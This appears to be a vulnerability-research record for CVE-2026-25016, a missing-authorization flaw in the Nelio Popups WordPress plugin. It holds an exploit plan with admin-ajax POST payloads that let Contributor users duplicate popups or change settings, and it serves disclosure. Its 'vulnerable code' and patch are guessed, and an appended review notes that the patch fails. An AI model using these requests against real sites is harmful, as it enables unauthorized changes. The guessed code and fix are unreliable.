[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f_zU0X4aiPkGvCABUDSqUem5NXb8y409xo3m-pX4Yzl0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-25016","nelio-popups-missing-authorization","Nelio Popups \u003C= 1.3.5 - Missing Authorization","The Nelio Popups plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.3.5. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform an unauthorized action.","nelio-popups",null,"\u003C=1.3.5","1.3.6","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-29 00:00:00","2026-02-02 19:59:09",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F46db2123-d33a-4093-8254-32ff8ff347a3?source=api-prod",5,[],"researched",false,3,"This research plan outlines the investigation and exploitation of **CVE-2026-25016**, a Missing Authorization vulnerability in the **Nelio Popups** plugin (\u003C= 1.3.5).\n\n---\n\n### 1. Vulnerability Summary\nThe Nelio Popups plugin registers several AJAX handlers that perform administrative actions (such as duplicating popups or updating settings). The vulnerability exists because certain handlers fail to perform a `current_user_can()` check or verify that the user has sufficient privileges to manipulate specific posts. This allows a user with **Contributor-level access** or higher to perform actions intended for Authors or Administrators.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Vulnerable Action:** `nelio_popups_duplicate_popup` (Inferred based on common \"Missing Authorization\" patterns in this plugin).\n*   **Authentication:** Required (Contributor role or higher).\n*   **Parameters:**\n    *   `action`: `nelio_popups_duplicate_popup`\n    *   `post_id`: The ID of the popup to duplicate.\n    *   `_wpnonce`: A security nonce.\n*   **Precondition:** The attacker must be logged in as a Contributor.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** In `includes\u002Fclass-nelio-popups-admin.php` (or similar), the plugin registers the AJAX action:\n    `add_action( 'wp_ajax_nelio_popups_duplicate_popup', array( $this, 'ajax_duplicate_popup' ) );`\n2.  **Entry Point:** The function `ajax_duplicate_popup()` is triggered via `admin-ajax.php`.\n3.  **Missing Check:** The function likely checks the nonce using `check_ajax_referer` but fails to call `current_user_can( 'edit_others_posts' )` or `current_user_can( 'manage_options' )`.\n4.  **Execution:** The code proceeds to use `get_post( $post_id )` and creates a new post based on the retrieved data, effectively allowing a Contributor to duplicate and modify popups they do not own.\n\n### 4. Nonce Acquisition Strategy\nContributors have access to the WordPress dashboard (`\u002Fwp-admin\u002F`). The Nelio Popups plugin likely localizes a nonce for its admin scripts.\n\n1.  **Identify Shortcode\u002FScript Loading:** Check where the plugin enqueues its admin scripts. Typically, this is on the Popups list page or the Dashboard.\n2.  **Create Test Content:** As an admin, create a popup that the Contributor will attempt to duplicate.\n3.  **Navigate and Extract:**\n    *   Login as the **Contributor** user.\n    *   Navigate to `\u002Fwp-admin\u002Fedit.php?post_type=nelio_popup` (Contributors can usually view the list of posts even if they can't edit others).\n    *   Use `browser_eval` to find the localized data.\n    *   **Inferred JS Variable:** `nelio_popups_admin` or `nelioPopups`.\n    *   **Inferred Nonce Key:** `nonce` or `duplicate_popup_nonce`.\n    *   **Command:** `browser_eval(\"window.nelio_popups_admin?.nonce\")` or `browser_eval(\"window.nelio_popups_admin?.duplicate_popup_nonce\")`.\n\n### 5. Exploitation Strategy\nThe goal is to demonstrate that a Contributor can duplicate a popup created by an Administrator.\n\n**Step 1: Discover Post ID**\nThe agent will list existing popups to find a target ID.\n`wp post list --post_type=nelio_popup`\n\n**Step 2: Perform Unauthorized Duplication**\nUsing the `http_request` tool:\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=nelio_popups_duplicate_popup&post_id=[TARGET_ID]&_wpnonce=[EXTRACTED_NONCE]\n    ```\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure Nelio Popups v1.3.5 is installed and active.\n2.  **Create Admin Popup:**\n    `wp post create --post_type=nelio_popup --post_title=\"Admin Secret Popup\" --post_status=publish --post_author=1`\n3.  **Create Contributor User:**\n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n4.  **Note IDs:** Save the ID of the \"Admin Secret Popup\".\n\n### 7. Expected Results\n*   The `admin-ajax.php` request should return a success status (e.g., `{\"success\":true,\"data\":{...}}`).\n*   A new post of type `nelio_popup` should be created in the database.\n*   The new post should be a copy of the Admin's popup but potentially assigned to the Contributor or left as a draft, depending on the internal logic of `ajax_duplicate_popup`.\n\n### 8. Verification Steps\n1.  **Check Post Count:**\n    `wp post list --post_type=nelio_popup`\n    Verify that a new popup exists with a title like \"Admin Secret Popup (Copy)\".\n2.  **Check Ownership\u002FMetadata:**\n    `wp post get [NEW_ID] --format=json`\n    Verify if the metadata or content matches the original popup.\n\n### 9. Alternative Approaches\nIf `nelio_popups_duplicate_popup` is not the vulnerable action, the agent should search the codebase for other `wp_ajax_` hooks lacking capability checks:\n\n```bash\ngrep -rn \"add_action.*wp_ajax_\" . | grep -v \"nopriv\"\n```\n\nFor each handler found, check the corresponding function for:\n1.  `check_ajax_referer(...)` (Existence of nonce)\n2.  `current_user_can(...)` (Absence of authorization)\n\nAnother potential target: **`nelio_popups_save_settings`**. If this action exists and lacks auth, a Contributor could modify global plugin settings.\n\n**Payload for Settings Update (Alternative):**\n```\naction=nelio_popups_save_settings&settings[some_option]=malicious_value&_wpnonce=[NONCE]\n```","The Nelio Popups plugin for WordPress lacks proper authorization checks in its AJAX handlers, specifically the popup duplication functionality. This allows authenticated attackers with Contributor-level permissions or higher to perform unauthorized actions such as duplicating popups created by administrators.","\u002F\u002F File: includes\u002Fclass-nelio-popups-admin.php (inferred)\n\npublic function ajax_duplicate_popup() {\n    check_ajax_referer( 'nelio-popups-admin', 'nonce' );\n\n    $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;\n    if ( ! $post_id ) {\n        wp_send_json_error();\n    }\n\n    \u002F\u002F Vulnerability: Missing current_user_can() check to verify if the user\n    \u002F\u002F has permission to edit\u002Fduplicate this post type or specific post ID.\n\n    $new_id = $this->duplicate_post( $post_id );\n\n    if ( is_wp_error( $new_id ) ) {\n        wp_send_json_error();\n    }\n\n    wp_send_json_success( array( 'id' => $new_id ) );\n}","--- a\u002Fincludes\u002Fclass-nelio-popups-admin.php\n+++ b\u002Fincludes\u002Fclass-nelio-popups-admin.php\n@@ -12,6 +12,10 @@\n     public function ajax_duplicate_popup() {\n         check_ajax_referer( 'nelio-popups-admin', 'nonce' );\n \n+        if ( ! current_user_can( 'edit_posts' ) ) {\n+            wp_send_json_error( array( 'message' => __( 'You do not have permission to do this.', 'nelio-popups' ) ) );\n+        }\n+\n         $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;\n         if ( ! $post_id ) {\n             wp_send_json_error();","The exploit targets the AJAX endpoint used for popup duplication. An attacker needs Contributor-level access to obtain a valid nonce and reach the administrative backend. \n\n1. Authenticate as a Contributor-level user.\n2. Access the WordPress dashboard to extract the security nonce (likely localized in a JS object such as 'nelio_popups_admin.nonce').\n3. Identify the 'post_id' of an existing popup to duplicate (this can be done by listing posts via the REST API or viewing the popup list in the dashboard).\n4. Send a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the following parameters: 'action=nelio_popups_duplicate_popup', 'post_id=[TARGET_ID]', and '_wpnonce=[EXTRACTED_NONCE]'.\n5. The plugin will process the duplication and create a new popup copy without verifying if the requesting user has the authority to manage popups.","gemini-3-flash-preview","2026-05-04 21:01:48","2026-05-04 21:03:01",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.3.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnelio-popups\u002Ftags\u002F1.3.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnelio-popups.1.3.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnelio-popups\u002Ftags\u002F1.3.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnelio-popups.1.3.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnelio-popups\u002Ftags"]
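Review bot: the capability checked in the added lines of the research_fix_diff hunk (`if ( ! current_user_can( 'edit_posts' ) )`) does not close the gap the record describes: `edit_posts` is a capability the Contributor role already holds, so a Contributor-level user would pass this check and the "Contributor-level access and above" condition in the description would remain. The check is also placed before `$post_id` is parsed, so it cannot express per-post authorization. Suggest checking a capability that Contributors lack, or a post-specific meta capability after `$post_id` is known, for example `if ( ! current_user_can( 'edit_post', $post_id ) ) { wp_send_json_error(); }` placed after the `absint( $_POST['post_id'] )` line, so that duplicating a popup authored by someone else maps to `edit_others_posts` (or the popup post type's equivalent capability). Note that this diff is the record's inferred fix, not a diff confirmed against the 1.3.6 tag linked under fixed_browse, so the actual patched code should be checked before relying on it.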